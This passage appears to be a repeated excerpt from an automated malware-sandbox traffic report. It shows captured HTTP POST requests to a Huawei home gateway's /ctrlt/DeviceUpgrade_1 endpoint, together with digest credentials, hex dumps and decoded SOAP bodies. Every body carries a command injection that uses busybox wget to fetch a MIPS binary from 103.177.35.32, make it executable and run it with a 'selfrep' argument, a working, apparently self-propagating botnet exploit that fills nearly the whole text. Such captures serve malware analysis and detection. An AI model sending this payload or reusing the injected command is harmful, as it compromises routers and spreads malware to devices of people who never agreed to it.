72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
